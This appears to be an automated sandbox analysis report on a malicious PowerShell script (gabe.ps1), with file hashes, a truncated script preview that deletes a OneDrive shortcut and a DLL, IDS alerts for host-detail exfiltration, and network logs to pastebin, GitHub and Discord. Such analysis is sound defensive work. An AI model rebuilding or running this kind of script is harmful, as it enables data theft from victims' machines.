                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkmtnjyk.we4.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ku3bjgdg.gz4.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnadb5un.kzr.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc2g14tn.zr4.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nh0mg5uy.rbg.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o00pif3t.4ob.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urwvgg5m.lu5.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6220
                                                              Entropy (8bit):3.727628398501691
                                                              Encrypted:false
                                                              SSDEEP:48:yHm12/nfCgboU2fSiukvhkvklCywPg6nxxHlLtSogZoYanxxHl7tSogZo81:R6fCgV48kvhkvCCtTxxHqHcxxH+HL
                                                              MD5:904DE5A9B31969150D49B65A6EE9BFFD
                                                              SHA1:BB3A85CB90C301915998AB0A8CD56A014A4CDC5A
                                                              SHA-256:9F52E1A1F0ED4E49B88DCCC4590773EBBE9AFA708BEEDBDA567EDB64FAF237B8
                                                              SHA-512:A33EBE6428D2EB3BB5CE4546884BFB1B0BD36D98B3D76AD236EB9275EF77EC28E50749116DEE13E123439118E0BD865B7AA5649E2DD5639492E44111E794C3EA
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ....N.5q....!.(....z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...J..#.....o.(........t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NOY.............................c..A.p.p.D.a.t.a...B.V.1.....OY...Roaming.@......EW)NOY...........................1...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)NOY............................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)NOY............................a7Z.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)NOY......................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)NOY......................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)NOY.................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LLC9C1YWH1OPDBNA0O7V.temp

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6220
                                                              Entropy (8bit):3.727628398501691
                                                              Encrypted:false
                                                              SSDEEP:48:yHm12/nfCgboU2fSiukvhkvklCywPg6nxxHlLtSogZoYanxxHl7tSogZo81:R6fCgV48kvhkvCCtTxxHqHcxxH+HL
                                                              MD5:904DE5A9B31969150D49B65A6EE9BFFD
                                                              SHA1:BB3A85CB90C301915998AB0A8CD56A014A4CDC5A
                                                              SHA-256:9F52E1A1F0ED4E49B88DCCC4590773EBBE9AFA708BEEDBDA567EDB64FAF237B8
                                                              SHA-512:A33EBE6428D2EB3BB5CE4546884BFB1B0BD36D98B3D76AD236EB9275EF77EC28E50749116DEE13E123439118E0BD865B7AA5649E2DD5639492E44111E794C3EA
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ....N.5q....!.(....z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...J..#.....o.(........t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NOY.............................c..A.p.p.D.a.t.a...B.V.1.....OY...Roaming.@......EW)NOY...........................1...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)NOY............................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)NOY............................a7Z.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)NOY......................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)NOY......................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)NOY.................

                                                              Static File Info

                                                              General

                                                              File type:ASCII text, with very long lines (4783)
                                                              Entropy (8bit):4.5873028836526855
                                                              TrID:
                                                                File name:gabe.ps1
                                                                File size:7'508 bytes
                                                                MD5:b6a2c4784a4fdccaf6147631a09db7b2
                                                                SHA1:9bfbd4f78733b48ecc0559063a9bff16d9d431d8
                                                                SHA256:9d84b453ea402ce8d38ab552790e5faf353f46a9b38b11a197e74eeade86f252
                                                                SHA512:23e0a9aa5ffd6fb2f7098d0daef551e81cab8d49585d8c6ceba9aab0000ce60661cf946c3ee3fcec7f5cb68f85070accdf3394722417f19e6de3a68b42ce4c64
                                                                SSDEEP:96:ZNMvCNMC8ZNMgJ++KpFsB1UEb3CBqZz+E6tNMK01G7Zl62IG:/MvMMbMMwpFshbwqUdMd2P
                                                                TLSH:B1F1AD71439097F4E9C187C5D06D73AB12BAC6A730A83D25DBE21E8B6D1AED770341B2
                                                                File Content Preview:sleep 5.rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force.sleep 5...$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk".if (-Not (Test-Path $googoogaagaa)) {.rm $env:tmp\onedrivefilesync.dll -force.New-ItemPropert

                                                                File Icon

                                                                Icon Hash:3270d6baae77db44

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-15T18:06:40.473702+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.1049710162.159.137.232443TCP
                                                                2024-10-15T18:06:53.937555+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.1049716162.159.137.232443TCP
                                                                2024-10-15T18:07:02.134101+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.1049717162.159.137.232443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 15, 2024 18:06:37.297087908 CEST4970780192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:37.309247971 CEST8049707104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:37.310630083 CEST4970780192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:37.314179897 CEST4970780192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:37.319221973 CEST8049707104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:37.955702066 CEST8049707104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:37.958513975 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:37.958554983 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:37.958641052 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:37.969157934 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:37.969173908 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.002526045 CEST4970780192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:38.634197950 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.634321928 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:38.680434942 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:38.680449009 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.681361914 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.688540936 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:38.731437922 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.836252928 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.836358070 CEST44349708104.20.3.235192.168.2.10
                                                                Oct 15, 2024 18:06:38.839014053 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:38.904223919 CEST49708443192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:06:38.931473970 CEST4970980192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:38.936665058 CEST8049709185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:38.936767101 CEST4970980192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:38.936966896 CEST4970980192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:38.941904068 CEST8049709185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:39.489013910 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:39.489037991 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:39.489120960 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:39.491782904 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:39.491791010 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:39.548886061 CEST8049709185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:39.549235106 CEST4970980192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:39.550955057 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:39.550983906 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:39.551069975 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:39.551366091 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:39.551378012 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:39.553294897 CEST8049709185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:39.553348064 CEST4970980192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:39.554292917 CEST8049709185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.118297100 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.118453979 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:40.126140118 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:40.126152039 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.126488924 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.138753891 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:40.179409981 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.190860987 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.190978050 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.192802906 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.192811012 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.193105936 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.194106102 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.239409924 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.265176058 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.265585899 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:40.265597105 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.320297003 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.320539951 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.320604086 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.320614100 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.321151972 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.321209908 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.321217060 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.321491957 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.321536064 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.321542025 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.330039024 CEST44349711185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:40.330100060 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.352607012 CEST49711443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:40.473716021 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.473819017 CEST44349710162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:40.473900080 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:40.482342005 CEST49710443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:45.333663940 CEST4971280192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:45.338505030 CEST8049712104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:45.338685989 CEST4971280192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:45.339966059 CEST4971280192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:45.344857931 CEST8049712104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:45.964656115 CEST8049712104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:45.986607075 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:45.986650944 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:45.986721992 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:45.990092039 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:45.990118027 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.017806053 CEST4971280192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:46.605071068 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.605140924 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:46.607166052 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:46.607182026 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.607611895 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.614975929 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:46.655401945 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.766426086 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.766582012 CEST44349713104.20.4.235192.168.2.10
                                                                Oct 15, 2024 18:06:46.766673088 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:47.425894976 CEST49713443192.168.2.10104.20.4.235
                                                                Oct 15, 2024 18:06:47.437634945 CEST4971480192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:47.442445040 CEST8049714185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:47.442509890 CEST4971480192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:47.442719936 CEST4971480192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:47.448278904 CEST8049714185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.057717085 CEST8049714185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.059329987 CEST8049714185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.059505939 CEST4971480192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.060527086 CEST4971480192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.061496973 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.061536074 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.061638117 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.061969995 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.061980963 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.066018105 CEST8049714185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.669809103 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.669904947 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.671540022 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.671552896 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.672355890 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.673516989 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.715414047 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.798808098 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.798975945 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.799051046 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.799066067 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.799094915 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.799379110 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.799455881 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.799468994 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.805455923 CEST44349715185.199.109.133192.168.2.10
                                                                Oct 15, 2024 18:06:48.805517912 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:48.826915979 CEST49715443192.168.2.10185.199.109.133
                                                                Oct 15, 2024 18:06:52.866866112 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:52.866913080 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:52.866991997 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:52.867492914 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:52.867511988 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.692110062 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.692327023 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:53.693873882 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:53.693881989 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.694248915 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.695229053 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:53.739392042 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.739485025 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:53.739489079 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.937583923 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.937669992 CEST44349716162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:06:53.937715054 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:53.939640045 CEST49716443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:06:58.971084118 CEST4970780192.168.2.10104.20.3.235
                                                                Oct 15, 2024 18:07:01.262609005 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.262639046 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:01.262727022 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.263115883 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.263130903 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:01.880309105 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:01.880589008 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.881844044 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.881853104 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:01.882113934 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:01.884026051 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.931401968 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:01.931596994 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:01.931610107 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:02.134116888 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:02.134183884 CEST44349717162.159.137.232192.168.2.10
                                                                Oct 15, 2024 18:07:02.135410070 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:02.137916088 CEST49717443192.168.2.10162.159.137.232
                                                                Oct 15, 2024 18:07:07.184926987 CEST4971280192.168.2.10104.20.4.235

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 15, 2024 18:06:37.270221949 CEST5073453192.168.2.101.1.1.1
                                                                Oct 15, 2024 18:06:37.282885075 CEST53507341.1.1.1192.168.2.10
                                                                Oct 15, 2024 18:06:38.923331976 CEST5973053192.168.2.101.1.1.1
                                                                Oct 15, 2024 18:06:38.930844069 CEST53597301.1.1.1192.168.2.10
                                                                Oct 15, 2024 18:06:39.477147102 CEST6512153192.168.2.101.1.1.1
                                                                Oct 15, 2024 18:06:39.484944105 CEST53651211.1.1.1192.168.2.10
                                                                Oct 15, 2024 18:06:45.317477942 CEST5597653192.168.2.101.1.1.1
                                                                Oct 15, 2024 18:06:45.326015949 CEST53559761.1.1.1192.168.2.10

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 15, 2024 18:06:37.270221949 CEST192.168.2.101.1.1.10x9f87Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:38.923331976 CEST192.168.2.101.1.1.10x350eStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:39.477147102 CEST192.168.2.101.1.1.10x3895Standard query (0)discord.comA (IP address)IN (0x0001)false
